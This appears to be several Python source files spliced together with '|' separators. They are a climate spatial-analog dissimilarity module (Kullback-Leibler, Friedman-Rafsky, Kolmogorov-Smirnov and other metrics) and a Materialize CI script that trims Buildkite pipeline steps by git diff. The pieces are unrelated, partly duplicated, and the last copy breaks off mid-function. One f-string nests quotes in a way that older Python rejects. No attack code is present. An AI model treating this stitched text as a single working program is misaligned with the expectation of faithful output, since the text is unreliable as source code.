def skezely_rizzo(x, y):
"""
Compute the Skezely-Rizzo energy distance dissimimilarity metric based on an analogy with the energy of a cloud of electrical charges.
Parameters
----------
x : ndarray (n,d)
Reference sample.
y : ndarray (m,d)
Candidate sample.
Returns
-------
float
Skezely-Rizzo dissimilarity metric ranging from -infinity to infinity.
References
----------
TODO
"""
raise NotImplementedError
# nx, d = x.shape
# ny, d = y.shape
#
# v = x.std(0, ddof=1) * y.std(0, ddof=1)
#
# dx = spatial.distance.pdist(x, 'seuclidean', V=v)
# dy = spatial.distance.pdist(y, 'seuclidean', V=v)
# dxy = spatial.distance.cdist(x, y, 'seuclidean', V=v)
#
# phix = -np.log(dx).sum() / nx / (nx - 1)
# phiy = -np.log(dy).sum() / ny / (ny - 1)
# phixy = np.log(dxy).sum() / nx / ny
# z = dxy.sum() * 2. / (nx*ny) - (1./nx**2) *
# z = (2 / (n * m)) * sum(dxy(:)) - (1 / (n ^ 2)) * sum(2 * dx) - (1 /
# (m ^ 2)) * sum(2 * dy);
# z = ((n * m) / (n + m)) * z;
@metric
def friedman_rafsky(x: np.ndarray, y: np.ndarray) -> float:
"""
Compute a dissimilarity metric based on the Friedman-Rafsky runs statistics.
The algorithm builds a minimal spanning tree (the subset of edges
connecting all points that minimizes the total edge length) then counts
the edges linking points from the same distribution.
Parameters
----------
x : np.ndarray (n,d)
Reference sample.
y : np.ndarray (m,d)
Candidate sample.
Returns
-------
float
Friedman-Rafsky dissimilarity metric ranging from 0 to (m+n-1)/(m+n).
References
----------
Friedman J.H. and Rafsky L.C. (1979) Multivariate generaliations of the
Wald-Wolfowitz and Smirnov two-sample tests. Annals of Stat. Vol.7, No. 4, 697-717.
"""
from scipy.sparse.csgraph import minimum_spanning_tree
from sklearn import neighbors
nx, _ = x.shape
ny, _ = y.shape
n = nx + ny
xy = np.vstack([x, y])
# Compute the NNs and the minimum spanning tree
g = neighbors.kneighbors_graph(xy, n_neighbors=n - 1, mode="distance")
mst = minimum_spanning_tree(g, overwrite=True)
edges = np.array(mst.nonzero()).T
# Number of points whose neighbor is from the other sample
diff = np.logical_xor(*(edges < nx).T).sum()
return 1.0 - (1.0 + diff) / n
@metric
def kolmogorov_smirnov(x: np.ndarray, y: np.ndarray) -> float:
"""
Compute the Kolmogorov-Smirnov statistic applied to two multivariate samples as described by Fasano and Franceschini.
Parameters
----------
x : np.ndarray (n,d)
Reference sample.
y : np.ndarray (m,d)
Candidate sample.
Returns
-------
float
Kolmogorov-Smirnov dissimilarity metric ranging from 0 to 1.
References
----------
Fasano G. and Francheschini A. (1987) A multidimensional version
of the Kolmogorov-Smirnov test. Monthly Notices of the Royal Astronomical Society, vol. 225, pp. 155-170.
"""
def pivot(x, y):
nx, d = x.shape
ny, d = y.shape
# Multiplicative factor converting d-dim booleans to a unique integer.
mf = (2 ** np.arange(d)).reshape(1, d, 1)
minlength = 2 ** d
# Assign a unique integer according on whether or not x[i] <= sample
ix = ((x.T <= np.atleast_3d(x)) * mf).sum(1)
iy = ((x.T <= np.atleast_3d(y)) * mf).sum(1)
# Count the number of samples in each quadrant
cx = 1.0 * np.apply_along_axis(np.bincount, 0, ix, minlength=minlength) / nx
cy = 1.0 * np.apply_along_axis(np.bincount, 0, iy, minlength=minlength) / ny
# This is from https://github.com/syrte/ndtest/blob/master/ndtest.py
# D = cx - cy
# D[0,:] -= 1. / nx # I don't understand this...
# dmin, dmax = -D.min(), D.max() + .1 / nx
return np.max(np.abs(cx - cy))
return max(pivot(x, y), pivot(y, x))
@metric
def kldiv(
x: np.ndarray, y: np.ndarray, *, k: Union[int, Sequence[int]] = 1
) -> Union[float, Sequence[float]]:
r"""
Compute the Kullback-Leibler divergence between two multivariate samples.
.. math
D(P||Q) = "\"frac{d}{n} "\"sum_i^n "\"log{"\"frac{r_k(x_i)}{s_k(x_i)}} + "\"log{"\"frac{m}{n-1}}
where r_k(x_i) and s_k(x_i) are, respectively, the euclidean distance
to the kth neighbour of x_i in the x array (excepting x_i) and
in the y array.
Parameters
----------
x : np.ndarray (n,d)
Samples from distribution P, which typically represents the true
distribution (reference).
y : np.ndarray (m,d)
Samples from distribution Q, which typically represents the
approximate distribution (candidate)
k : int or sequence
The kth neighbours to look for when estimating the density of the
distributions. Defaults to 1, which can be noisy.
Returns
-------
float or sequence
The estimated Kullback-Leibler divergence D(P||Q) computed from
the distances to the kth neighbour.
Notes
-----
In information theory, the Kullback–Leibler divergence is a non-symmetric
measure of the difference between two probability distributions P and Q,
where P is the "true" distribution and Q an approximation. This nuance is
important because D(P||Q) is not equal to D(Q||P).
For probability distributions P and Q of a continuous random variable,
the K–L divergence is defined as:
D_{KL}(P||Q) = "\"int p(x) "\"log{p()/q(x)} dx
This formula assumes we have a representation of the probability
densities p(x) and q(x). In many cases, we only have samples from the
distribution, and most methods first estimate the densities from the
samples and then proceed to compute the K-L divergence. In Perez-Cruz,
the authors propose an algorithm to estimate the K-L divergence directly
from the sample using an empirical CDF. Even though the CDFs do not
converge to their true values, the paper proves that the K-L divergence
almost surely does converge to its true value.
References
----------
Kullback-Leibler Divergence Estimation of Continuous Distributions (2008).
Fernando Pérez-Cruz.
"""
mk = np.iterable(k)
ka = np.atleast_1d(k)
nx, d = x.shape
ny, d = y.shape
# Limit the number of dimensions to 10, too slow otherwise.
if d > 10:
raise ValueError("Too many dimensions: {}.".format(d))
# Not enough data to draw conclusions.
if nx < 5 or ny < 5:
return np.nan if not mk else [np.nan] * len(k)
# Build a KD tree representation of the samples.
xtree = KDTree(x)
ytree = KDTree(y)
# Get the k'th nearest neighbour from each points in x for both x and y.
# We get the values for K + 1 to make sure the output is a 2D array.
kmax = max(ka) + 1
r, _ = xtree.query(x, k=kmax, eps=0, p=2, workers=2)
s, _ = ytree.query(x, k=kmax, eps=0, p=2, workers=2)
# There is a mistake in the paper. In Eq. 14, the right side misses a
# negative sign on the first term of the right hand side.
out = list()
for ki in ka:
# The 0th nearest neighbour of x[i] in x is x[i] itself.
# Hence we take the k'th + 1, which in 0-based indexing is given by
# index k.
out.append(
-np.log(r[:, ki] / s[:, ki - 1]).sum() * d / nx + np.log(ny / (nx - 1.0))
)
if mk:
return out
return out[0]
| # -*- encoding: utf8 -*-
# noqa: D205,D400
"""
Spatial analogs
===============
Spatial analogues are maps showing which areas have a present-day climate that is analogous
to the future climate of a given place. This type of map can be useful for climate adaptation
to see how well regions are coping today under specific climate conditions. For example,
officials from a city located in a temperate region that may be expecting more heatwaves in
the future can learn from the experience of another city where heatwaves are a common occurrence,
leading to more proactive intervention plans to better deal with new climate conditions.
Spatial analogues are estimated by comparing the distribution of climate indices computed at
the target location over the future period with the distribution of the same climate indices
computed over a reference period for multiple candidate regions. A number of methodological
choices thus enter the computation:
- Climate indices of interest,
- Metrics measuring the difference between both distributions,
- Reference data from which to compute the base indices,
- A future climate scenario to compute the target indices.
The climate indices chosen to compute the spatial analogues are usually annual values of
indices relevant to the intended audience of these maps. For example, in the case of the
wine grape industry, the climate indices examined could include the length of the frost-free
season, growing degree-days, annual winter minimum temperature andand annual number of
very cold days [Roy2017]_.
Methods to compute the (dis)similarity between samples
------------------------------------------------------
This module implements five of the six methods described in [Grenier2013]_ to measure
the dissimilarity between two samples. Some of these algorithms can be used to
test whether or not two samples have been drawn from the same distribution.
Here, they are used to find areas with analog climate conditions to a target
climate.
Methods available
~~~~~~~~~~~~~~~~~
* Standardized Euclidean distance
* Nearest Neighbour distance
* Zech-Aslan energy statistic
* Friedman-Rafsky runs statistic
* Kolmogorov-Smirnov statistic
* Kullback-Leibler divergence
All methods accept arrays, the first is the reference (n, D) and
the second is the candidate (m, D). Where the climate indicators
vary along D and the distribution dimension along n or m. All methods output
a single float.
.. rubric:: References
.. [Roy2017] Roy, P., Grenier, P., Barriault, E. et al. Climatic Change (2017) 143: 43. `<doi:10.1007/s10584-017-1960-x>`_
.. [Grenier2013] Grenier, P., A.-C. Parent, D. Huard, F. Anctil, and D. Chaumont, 2013: An assessment of six dissimilarity metrics for climate analogs. J. Appl. Meteor. Climatol., 52, 733–752, `<doi:10.1175/JAMC-D-12-0170.1>`_
"""
# Code adapted from flyingpigeon.dissimilarity, Nov 2020.
from typing import Sequence, Tuple, Union
import numpy as np
import xarray as xr
from boltons.funcutils import wraps
from pkg_resources import parse_version
from scipy import __version__ as __scipy_version__
from scipy import spatial
from scipy.spatial import cKDTree as KDTree
# TODO: Szekely, G, Rizzo, M (2014) Energy statistics: A class of statistics
# based on distances. J Stat Planning & Inference 143: 1249-1272
# TODO: Hellinger distance
metrics = dict()
def spatial_analogs(
target: xr.Dataset,
candidates: xr.Dataset,
dist_dim: Union[str, Sequence[str]] = "time",
method: str = "kldiv",
**kwargs,
):
"""Compute dissimilarity statistics between target points and candidate points.
Spatial analogs based on the comparison of climate indices. The algorithm compares
the distribution of the reference indices with the distribution of spatially
distributed candidate indices and returns a value measuring the dissimilarity
between both distributions over the candidate grid.
Parameters
----------
target : xr.Dataset
Dataset of the target indices. Only indice variables should be included in the
dataset's `data_vars`. They should have only the dimension(s) `dist_dim `in common with `candidates`.
candidates : xr.Dataset
Dataset of the candidate indices. Only indice variables should be included in
the dataset's `data_vars`.
dist_dim : str
The dimension over which the *distributions* are constructed. This can be a multi-index dimension.
method : {'seuclidean', 'nearest_neighbor', 'zech_aslan', 'kolmogorov_smirnov', 'friedman_rafsky', 'kldiv'}
Which method to use when computing the dissimilarity statistic.
**kwargs
Any other parameter passed directly to the dissimilarity method.
Returns
-------
xr.DataArray
The dissimilarity statistic over the union of candidates' and target's dimensions.
"""
if parse_version(__scipy_version__) < parse_version("1.6.0") and method in [
"kldiv",
"nearest_neighbor",
]:
raise RuntimeError(f"Spatial analog method ({method}) requires scipy>=1.6.0.")
# Create the target DataArray:
target = xr.concat(
target.data_vars.values(),
xr.DataArray(list(target.data_vars.keys()), dims=("indices",), name="indices"),
)
# Create the target DataArray with different dist_dim
c_dist_dim = "candidate_dist_dim"
candidates = xr.concat(
candidates.data_vars.values(),
xr.DataArray(
list(candidates.data_vars.keys()),
dims=("indices",),
name="indices",
),
).rename({dist_dim: c_dist_dim})
try:
metric = metrics[method]
except KeyError:
raise ValueError(
f"Method {method} is not implemented. Available methods are : {','.join(metrics.keys())}."
)
# Compute dissimilarity
diss = xr.apply_ufunc(
metric,
target,
candidates,
input_core_dims=[(dist_dim, "indices"), (c_dist_dim, "indices")],
output_core_dims=[()],
vectorize=True,
dask="parallelized",
output_dtypes=[float],
**kwargs,
)
diss.name = "dissimilarity"
diss.attrs.update(
long_name=f"Dissimilarity between target and candidates, using metric {method}.",
indices=",".join(target.indices.values),
metric=method,
)
return diss
# ---------------------------------------------------------------------------- #
# -------------------------- Utility functions ------------------------------- #
# ---------------------------------------------------------------------------- #
def standardize(x: np.ndarray, y: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:
"""
Standardize x and y by the square root of the product of their standard deviation.
Parameters
----------
x: np.ndarray
Array to be compared.
y: np.ndarray
Array to be compared.
Returns
-------
(ndarray, ndarray)
Standardized arrays.
"""
s = np.sqrt(x.std(0, ddof=1) * y.std(0, ddof=1))
return x / s, y / s
def metric(func):
"""Register a metric function in the `metrics` mapping and add some preparation/checking code.
All metric functions accept 2D inputs. This reshape 1D inputs to (n, 1) and (m, 1).
All metric functions are invalid when any non-finite values are present in the inputs.
"""
@wraps(func)
def _metric_overhead(x, y, **kwargs):
if np.any(np.isnan(x)) or np.any(np.isnan(y)):
return np.NaN
x = np.atleast_2d(x)
y = np.atleast_2d(y)
# If array is 1D, flip it.
if x.shape[0] == 1:
x = x.T
if y.shape[0] == 1:
y = y.T
if x.shape[1] != y.shape[1]:
raise AttributeError("Shape mismatch")
return func(x, y, **kwargs)
metrics[func.__name__] = _metric_overhead
return _metric_overhead
# ---------------------------------------------------------------------------- #
# ------------------------ Dissimilarity metrics ----------------------------- #
# ---------------------------------------------------------------------------- #
@metric
def seuclidean(x: np.ndarray, y: np.ndarray) -> float:
"""
Compute the Euclidean distance between the mean of a multivariate candidate sample with respect to the mean of a reference sample.
Parameters
----------
x : np.ndarray (n,d)
Reference sample.
y : np.ndarray (m,d)
Candidate sample.
Returns
-------
float
Standardized Euclidean Distance between the mean of the samples
ranging from 0 to infinity.
Notes
-----
This metric considers neither the information from individual points nor
the standard deviation of the candidate distribution.
References
----------
Veloz et al. (2011) Identifying climatic analogs for Wisconsin under
21st-century climate-change scenarios. Climatic Change,
DOI 10.1007/s10584-011-0261-z.
"""
mx = x.mean(axis=0)
my = y.mean(axis=0)
return spatial.distance.seuclidean(mx, my, x.var(axis=0, ddof=1))
@metric
def nearest_neighbor(x: np.ndarray, y: np.ndarray) -> np.ndarray:
"""
Compute a dissimilarity metric based on the number of points in the pooled sample whose nearest neighbor belongs to the same distribution.
Parameters
----------
x : np.ndarray (n,d)
Reference sample.
y : np.ndarray (m,d)
Candidate sample.
Returns
-------
float
Nearest-Neighbor dissimilarity metric ranging from 0 to 1.
References
----------
Henze N. (1988) A Multivariate two-sample test based on the number of
nearest neighbor type coincidences. Ann. of Stat., Vol. 16, No.2, 772-783.
"""
x, y = standardize(x, y)
nx, _ = x.shape
# Pool the samples and find the nearest neighbours
xy = np.vstack([x, y])
tree = KDTree(xy)
_, ind = tree.query(xy, k=2, eps=0, p=2, workers=2)
# Identify points whose neighbors are from the same sample
same = ~np.logical_xor(*(ind < nx).T)
return same.mean()
@metric
def zech_aslan(x: np.ndarray, y: np.ndarray) -> float:
"""
Compute the Zech-Aslan energy distance dissimimilarity metric based on an analogy with the energy of a cloud of electrical charges.
Parameters
----------
x : np.ndarray (n,d)
Reference sample.
y : np.ndarray (m,d)
Candidate sample.
Returns
-------
float
Zech-Aslan dissimilarity metric ranging from -infinity to infinity.
References
----------
Zech G. and Aslan B. (2003) A Multivariate two-sample test based on the
concept of minimum energy. PHYStat2003, SLAC, Stanford, CA, Sep 8-11.
Aslan B. and Zech G. (2008) A new class of binning-free, multivariate
goodness-of-fit tests: the energy tests. arXiV:hep-ex/0203010v5.
"""
nx, d = x.shape
ny, d = y.shape
v = (x.std(axis=0, ddof=1) * y.std(axis=0, ddof=1)).astype(np.double)
dx = spatial.distance.pdist(x, "seuclidean", V=v)
dy = spatial.distance.pdist(y, "seuclidean", V=v)
dxy = spatial.distance.cdist(x, y, "seuclidean", V=v)
phix = -np.log(dx).sum() / nx / (nx - 1)
phiy = -np.log(dy).sum() / ny / (ny - 1)
phixy = np.log(dxy).sum() / nx / ny
return phix + phiy + phixy
@metric
def skezely_rizzo(x, y):
"""
Compute the Skezely-Rizzo energy distance dissimimilarity metric based on an analogy with the energy of a cloud of electrical charges.
Parameters
----------
x : ndarray (n,d)
Reference sample.
y : ndarray (m,d)
Candidate sample.
Returns
-------
float
Skezely-Rizzo dissimilarity metric ranging from -infinity to infinity.
References
----------
TODO
"""
raise NotImplementedError
# nx, d = x.shape
# ny, d = y.shape
#
# v = x.std(0, ddof=1) * y.std(0, ddof=1)
#
# dx = spatial.distance.pdist(x, 'seuclidean', V=v)
# dy = spatial.distance.pdist(y, 'seuclidean', V=v)
# dxy = spatial.distance.cdist(x, y, 'seuclidean', V=v)
#
# phix = -np.log(dx).sum() / nx / (nx - 1)
# phiy = -np.log(dy).sum() / ny / (ny - 1)
# phixy = np.log(dxy).sum() / nx / ny
# z = dxy.sum() * 2. / (nx*ny) - (1./nx**2) *
# z = (2 / (n * m)) * sum(dxy(:)) - (1 / (n ^ 2)) * sum(2 * dx) - (1 /
# (m ^ 2)) * sum(2 * dy);
# z = ((n * m) / (n + m)) * z;
@metric
def friedman_rafsky(x: np.ndarray, y: np.ndarray) -> float:
"""
Compute a dissimilarity metric based on the Friedman-Rafsky runs statistics.
The algorithm builds a minimal spanning tree (the subset of edges
connecting all points that minimizes the total edge length) then counts
the edges linking points from the same distribution.
Parameters
----------
x : np.ndarray (n,d)
Reference sample.
y : np.ndarray (m,d)
Candidate sample.
Returns
-------
float
Friedman-Rafsky dissimilarity metric ranging from 0 to (m+n-1)/(m+n).
References
----------
Friedman J.H. and Rafsky L.C. (1979) Multivariate generaliations of the
Wald-Wolfowitz and Smirnov two-sample tests. Annals of Stat. Vol.7, No. 4, 697-717.
"""
from scipy.sparse.csgraph import minimum_spanning_tree
from sklearn import neighbors
nx, _ = x.shape
ny, _ = y.shape
n = nx + ny
xy = np.vstack([x, y])
# Compute the NNs and the minimum spanning tree
g = neighbors.kneighbors_graph(xy, n_neighbors=n - 1, mode="distance")
mst = minimum_spanning_tree(g, overwrite=True)
edges = np.array(mst.nonzero()).T
# Number of points whose neighbor is from the other sample
diff = np.logical_xor(*(edges < nx).T).sum()
return 1.0 - (1.0 + diff) / n
@metric
def kolmogorov_smirnov(x: np.ndarray, y: np.ndarray) -> float:
"""
Compute the Kolmogorov-Smirnov statistic applied to two multivariate samples as described by Fasano and Franceschini.
Parameters
----------
x : np.ndarray (n,d)
Reference sample.
y : np.ndarray (m,d)
Candidate sample.
Returns
-------
float
Kolmogorov-Smirnov dissimilarity metric ranging from 0 to 1.
References
----------
Fasano G. and Francheschini A. (1987) A multidimensional version
of the Kolmogorov-Smirnov test. Monthly Notices of the Royal Astronomical Society, vol. 225, pp. 155-170.
"""
def pivot(x, y):
nx, d = x.shape
ny, d = y.shape
# Multiplicative factor converting d-dim booleans to a unique integer.
mf = (2 ** np.arange(d)).reshape(1, d, 1)
minlength = 2 ** d
# Assign a unique integer according on whether or not x[i] <= sample
ix = ((x.T <= np.atleast_3d(x)) * mf).sum(1)
iy = ((x.T <= np.atleast_3d(y)) * mf).sum(1)
# Count the number of samples in each quadrant
cx = 1.0 * np.apply_along_axis(np.bincount, 0, ix, minlength=minlength) / nx
cy = 1.0 * np.apply_along_axis(np.bincount, 0, iy, minlength=minlength) / ny
# This is from https://github.com/syrte/ndtest/blob/master/ndtest.py
# D = cx - cy
# D[0,:] -= 1. / nx # I don't understand this...
# dmin, dmax = -D.min(), D.max() + .1 / nx
return np.max(np.abs(cx - cy))
return max(pivot(x, y), pivot(y, x))
@metric
def kldiv(
x: np.ndarray, y: np.ndarray, *, k: Union[int, Sequence[int]] = 1
) -> Union[float, Sequence[float]]:
r"""
Compute the Kullback-Leibler divergence between two multivariate samples.
.. math
D(P||Q) = "\"frac{d}{n} "\"sum_i^n "\"log{"\"frac{r_k(x_i)}{s_k(x_i)}} + "\"log{"\"frac{m}{n-1}}
where r_k(x_i) and s_k(x_i) are, respectively, the euclidean distance
to the kth neighbour of x_i in the x array (excepting x_i) and
in the y array.
Parameters
----------
x : np.ndarray (n,d)
Samples from distribution P, which typically represents the true
distribution (reference).
y : np.ndarray (m,d)
Samples from distribution Q, which typically represents the
approximate distribution (candidate)
k : int or sequence
The kth neighbours to look for when estimating the density of the
distributions. Defaults to 1, which can be noisy.
Returns
-------
float or sequence
The estimated Kullback-Leibler divergence D(P||Q) computed from
the distances to the kth neighbour.
Notes
-----
In information theory, the Kullback–Leibler divergence is a non-symmetric
measure of the difference between two probability distributions P and Q,
where P is the "true" distribution and Q an approximation. This nuance is
important because D(P||Q) is not equal to D(Q||P).
For probability distributions P and Q of a continuous random variable,
the K–L divergence is defined as:
D_{KL}(P||Q) = "\"int p(x) "\"log{p()/q(x)} dx
This formula assumes we have a representation of the probability
densities p(x) and q(x). In many cases, we only have samples from the
distribution, and most methods first estimate the densities from the
samples and then proceed to compute the K-L divergence. In Perez-Cruz,
the authors propose an algorithm to estimate the K-L divergence directly
from the sample using an empirical CDF. Even though the CDFs do not
converge to their true values, the paper proves that the K-L divergence
almost surely does converge to its true value.
References
----------
Kullback-Leibler Divergence Estimation of Continuous Distributions (2008).
Fernando Pérez-Cruz.
"""
mk = np.iterable(k)
ka = np.atleast_1d(k)
nx, d = x.shape
ny, d = y.shape
# Limit the number of dimensions to 10, too slow otherwise.
if d > 10:
raise ValueError("Too many dimensions: {}.".format(d))
# Not enough data to draw conclusions.
if nx < 5 or ny < 5:
return np.nan if not mk else [np.nan] * len(k)
# Build a KD tree representation of the samples.
xtree = KDTree(x)
ytree = KDTree(y)
# Get the k'th nearest neighbour from each points in x for both x and y.
# We get the values for K + 1 to make sure the output is a 2D array.
kmax = max(ka) + 1
r, _ = xtree.query(x, k=kmax, eps=0, p=2, workers=2)
s, _ = ytree.query(x, k=kmax, eps=0, p=2, workers=2)
# There is a mistake in the paper. In Eq. 14, the right side misses a
# negative sign on the first term of the right hand side.
out = list()
for ki in ka:
# The 0th nearest neighbour of x[i] in x is x[i] itself.
# Hence we take the k'th + 1, which in 0-based indexing is given by
# index k.
out.append(
-np.log(r[:, ki] / s[:, ki - 1]).sum() * d / nx + np.log(ny / (nx - 1.0))
)
if mk:
return out
return out[0]
|
# Copyright Materialize, Inc. and contributors. All rights reserved.
#
# Use of this software is governed by the Business Source License
# included in the LICENSE file at the root of this repository.
#
# As of the Change Date specified in that file, in accordance with
# the Business Source License, use of this software will be governed
# by the Apache License, Version 2.0.
"""Generator for the test CI pipeline.
This script takes pipeline.template.yml as input, possibly trims out jobs
whose inputs have not changed relative to the code on main, and uploads the
resulting pipeline to the Buildkite job that triggers this script.
On main and tags, all jobs are always run.
For details about how steps are trimmed, see the comment at the top of
pipeline.template.yml and the docstring on `trim_pipeline` below.
"""
import copy
import os
import subprocess
import sys
from collections import OrderedDict
from pathlib import Path
from typing import Any, Iterable, Set
import yaml
from materialize import mzbuild, mzcompose, spawn
from ..deploy.deploy_util import environmentd_rust_version
# These paths contain "CI glue code", i.e., the code that powers CI itself,
# including this very script! All of CI implicitly depends on this code, so
# whenever it changes, we ought not trim any jobs from the pipeline in order to
# exercise as much of the glue code as possible.
#
# It's tough to track this code with any sort of fine-grained granularity, so we
# err on the side of including too much rather than too little. (For example,
# bin/resync-submodules is not presently used by CI, but it's just not worth
# trying to capture that.)
CI_GLUE_GLOBS = ["bin", "ci", "misc/python"]
def main() -> int:
# Make sure we have an up to date view of main.
spawn.runv(["git", "fetch", "origin", "main"])
# Print out a summary of all changes.
os.environ["GIT_PAGER"] = ""
spawn.runv(["git", "diff", "--stat", "origin/main..."])
with open(Path(__file__).parent / "pipeline.template.yml") as f:
raw = f.read()
raw = raw.replace("$ENVIRONMENTD_RUST_VERSION", environmentd_rust_version())
pipeline = yaml.safe_load(raw)
if os.environ["BUILDKITE_BRANCH"] == "main" or os.environ["BUILDKITE_TAG"]:
print("On main branch or tag, so not trimming pipeline")
elif have_paths_changed(CI_GLUE_GLOBS):
# We still execute pipeline trimming on a copy of the pipeline to
# protect against bugs in the pipeline trimming itself.
print("--- [DRY RUN] Trimming unchanged steps from pipeline")
print(
"Repository glue code has changed, so the trimmed pipeline below does not apply"
)
trim_pipeline(copy.deepcopy(pipeline))
else:
print("--- Trimming unchanged steps from pipeline")
trim_pipeline(pipeline)
# Upload a dummy JUnit report so that the "Analyze tests" step doesn't fail
# if we trim away all the JUnit report-generating steps.
Path("junit-dummy.xml").write_text("")
spawn.runv(["buildkite-agent", "artifact", "upload", "junit-dummy.xml"])
# Remove the Materialize-specific keys from the configuration that are
# only used to inform how to trim the pipeline.
for step in pipeline["steps"]:
if "inputs" in step:
del step["inputs"]
spawn.runv(
["buildkite-agent", "pipeline", "upload"], stdin=yaml.dump(pipeline).encode()
)
return 0
class PipelineStep:
def __init__(self, id: str):
self.id = id
self.extra_inputs: Set[str] = set()
self.image_dependencies: Set[mzbuild.ResolvedImage] = set()
self.step_dependencies: Set[str] = set()
def inputs(self) -> Set[str]:
inputs = set()
inputs.update(self.extra_inputs)
for image in self.image_dependencies:
inputs.update(image.inputs(transitive=True))
return inputs
def trim_pipeline(pipeline: Any) -> None:
"""Trim pipeline steps whose inputs have not changed in this branch.
Steps are assigned inputs in two ways:
1. An explicit glob in the `inputs` key.
2. An implicit dependency on any number of mzbuild images via the
mzcompose plugin. Any steps which use the mzcompose plugin will
have inputs autodiscovered based on the images used in that
mzcompose configuration.
A step is trimmed if a) none of its inputs have changed, and b) there are
no other untrimmed steps that depend on it.
"""
repo = mzbuild.Repository(Path("."))
steps = OrderedDict()
for config in pipeline["steps"]:
if "wait" in config:
continue
step = PipelineStep(config["id"])
if "inputs" in config:
for inp in config["inputs"]:
step.extra_inputs.add(inp)
if "depends_on" in config:
d = config["depends_on"]
if isinstance(d, str):
step.step_dependencies.add(d)
elif isinstance(d, list):
step.step_dependencies.update(d)
else:
raise ValueError(f"unexpected non-str non-list for depends_on: {d}")
if "plugins" in config:
for plugin in config["plugins"]:
for plugin_name, plugin_config in plugin.items():
if plugin_name == "./ci/plugins/mzcompose":
name = plugin_config["composition"]
composition = mzcompose.Composition(repo, name)
for dep in composition.dependencies:
step.image_dependencies.add(dep)
step.extra_inputs.add(str(repo.compositions[name]))
steps[step.id] = step
# Find all the steps whose inputs have changed with respect to main.
# We delegate this hard work to Git.
changed = set()
for step in steps.values():
inputs = step.inputs()
if not inputs:
# No inputs means there is no way this step can be considered
# changed, but `git diff` with no pathspecs means "diff everything",
# not "diff nothing", so explicitly skip.
continue
if have_paths_changed(inputs):
changed.add(step.id)
# Then collect all changed steps, and all the steps that those changed steps
# depend on.
needed = set()
def visit(step: PipelineStep) -> None:
if step.id not in needed:
needed.add(step.id)
for d in step.step_dependencies:
visit(steps[d])
for step_id in changed:
visit(steps[step_id])
# Print decisions, for debugging.
for step in steps.values():
print(f'{'✓' if step.id in needed else '✗'} {step.id}')
if step.step_dependencies:
print(" wait:", " ".join(step.step_dependencies))
if step.extra_inputs:
print(" globs:", " ".join(step.extra_inputs))
if step.image_dependencies:
print(
" images:", " ".join(image.name for image in step.image_dependencies)
)
# Restrict the pipeline to the needed steps.
pipeline["steps"] = [
step for step in pipeline["steps"] if "wait" in step or step["id"] in needed
]
def have_paths_changed(globs: Iterable[str]) -> bool:
"""Reports whether the specified globs have diverged from origin/main."""
diff = subprocess.run(
["git", "diff", "--no-patch", "--quiet", "origin/main...", "--", *globs]
)
if diff.returncode == 0:
return False
elif diff.returncode == 1:
return True
else:
diff.check_returncode()
raise RuntimeError("unreachable")
if __name__ == "__main__":
sys.exit(main())
| # Copyright Materialize, Inc. and contributors. All rights reserved.
#
# Use of this software is governed by the Business Source License
# included in the LICENSE file at the root of this repository.
#
# As of the Change Date specified in that file, in accordance with
# the Business Source License, use of this software will be governed
# by the Apache License, Version 2.0.
"""Generator for the test CI pipeline.
This script takes pipeline.template.yml as input, possibly trims out jobs
whose inputs have not changed relative to the code on main, and uploads the
resulting pipeline to the Buildkite job that triggers this script.
On main and tags, all jobs are always run.
For details about how steps are trimmed, see the comment at the top of
pipeline.template.yml and the docstring on `trim_pipeline` below.
"""
import copy
import os
import subprocess
import sys
from collections import OrderedDict
from pathlib import Path
from typing import Any, Iterable, Set
import yaml
from materialize import mzbuild, mzcompose, spawn
from ..deploy.deploy_util import environmentd_rust_version
# These paths contain "CI glue code", i.e., the code that powers CI itself,
# including this very script! All of CI implicitly depends on this code, so
# whenever it changes, we ought not trim any jobs from the pipeline in order to
# exercise as much of the glue code as possible.
#
# It's tough to track this code with any sort of fine-grained granularity, so we
# err on the side of including too much rather than too little. (For example,
# bin/resync-submodules is not presently used by CI, but it's just not worth
# trying to capture that.)
CI_GLUE_GLOBS = ["bin", "ci", "misc/python"]
def main() -> int:
# Make sure we have an up to date view of main.
spawn.runv(["git", "fetch", "origin", "main"])
# Print out a summary of all changes.
os.environ["GIT_PAGER"] = ""
spawn.runv(["git", "diff", "--stat", "origin/main..."])
with open(Path(__file__).parent / "pipeline.template.yml") as f:
raw = f.read()
raw = raw.replace("$ENVIRONMENTD_RUST_VERSION", environmentd_rust_version())
pipeline = yaml.safe_load(raw)
if os.environ["BUILDKITE_BRANCH"] == "main" or os.environ["BUILDKITE_TAG"]:
print("On main branch or tag, so not trimming pipeline")
elif have_paths_changed(CI_GLUE_GLOBS):
# We still execute pipeline trimming on a copy of the pipeline to
# protect against bugs in the pipeline trimming itself.
print("--- [DRY RUN] Trimming unchanged steps from pipeline")
print(
"Repository glue code has changed, so the trimmed pipeline below does not apply"
)
trim_pipeline(copy.deepcopy(pipeline))
else:
print("--- Trimming unchanged steps from pipeline")
trim_pipeline(pipeline)
# Upload a dummy JUnit report so that the "Analyze tests" step doesn't fail
# if we trim away all the JUnit report-generating steps.
Path("junit-dummy.xml").write_text("")
spawn.runv(["buildkite-agent", "artifact", "upload", "junit-dummy.xml"])
# Remove the Materialize-specific keys from the configuration that are
# only used to inform how to trim the pipeline.
for step in pipeline["steps"]:
if "inputs" in step:
del step["inputs"]
spawn.runv(
["buildkite-agent", "pipeline", "upload"], stdin=yaml.dump(pipeline).encode()
)
return 0
class PipelineStep:
def __init__(self, id: str):
self.id = id
self.extra_inputs: Set[str] = set()
self.image_dependencies: Set[mzbuild.ResolvedImage] = set()
self.step_dependencies: Set[str] = set()
def inputs(self) -> Set[str]:
inputs = set()
inputs.update(self.extra_inputs)
for image in self.image_dependencies:
inputs.update(image.inputs(transitive=True))
return inputs
def trim_pipeline(pipeline: Any) -> None:
"""Trim pipeline steps whose inputs have not changed in this branch.
Steps are assigned inputs in two ways:
1. An explicit glob in the `inputs` key.
2. An implicit dependency on any number of mzbuild images via the
mzcompose plugin. Any steps which use the mzcompose plugin will
have inputs autodiscovered based on the images used in that
mzcompose configuration.
A step is trimmed if a) none of its inputs have changed, and b) there are
no other untrimmed steps that depend on it.
"""
repo = mzbuild.Repository(Path("."))
steps = OrderedDict()
for config in pipeline["steps"]:
if "wait" in config:
continue
step = PipelineStep(config["id"])
if "inputs" in config:
for inp in config["inputs"]:
step.extra_inputs.add(inp)
if "depends_on" in config:
d = config["depends_on"]
if isinstance(d, str):
step.step_dependencies.add(d)
elif isinstance(d, list):
step.step_dependencies.update(d)
else:
